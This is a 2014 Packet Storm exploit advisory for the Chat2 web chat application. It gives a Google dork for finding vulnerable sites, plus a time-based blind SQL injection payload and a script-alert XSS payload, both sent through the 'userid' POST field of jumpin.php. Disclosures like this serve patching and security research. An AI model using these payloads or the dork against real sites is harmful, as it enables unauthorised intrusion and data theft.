Chat2 Cross Site Scripting / SQL Injection

2014-03-19T00:00:00
ID PACKETSTORM:125780
Type packetstorm
Reporter Hossein Hezami
Modified 2014-03-19T00:00:00

Description

                                        
                                            `#######################################################################  
#  
# Exploit Title:   
# Chat2 Blind SQL Injection  
# Chat2 Cross site scripting  
# Date: 2014 18 March  
# Author: Dr.3v1l  
# Tested on: Windows  
# Category: webapps  
# Google Dork: inurl:"/chatrooms.php"  
#  
#######################################################################  
#  
# [+] Exploit (SQL):  
#  
# http://<server>/Chat2/jumpin.php  
#  
# URL encoded POST input userid was set to :  
# (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/  
#  
#######################################################################  
#  
# [+] Exploit (XSS):  
#  
# http://<server>/Chat2/jumpin.php  
#  
# URL encoded POST input userid was set to :  
# "><script>alert(/xss/)</script>  
#  
#######################################################################  
#  
# [+] Contact Me :  
#  
# B.Devils.B@gmail.com  
# Twitter.com/Doctor_3v1l  
# Facebook.com/bdb.0web  
# Facebook.com/groups/1427166220843499/  
# IR.linkedin.com/in/hossein3v1l  
# Hossein Hezami - Black_Devils B0ys  
#  
#######################################################################  
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam  
#######################################################################  
`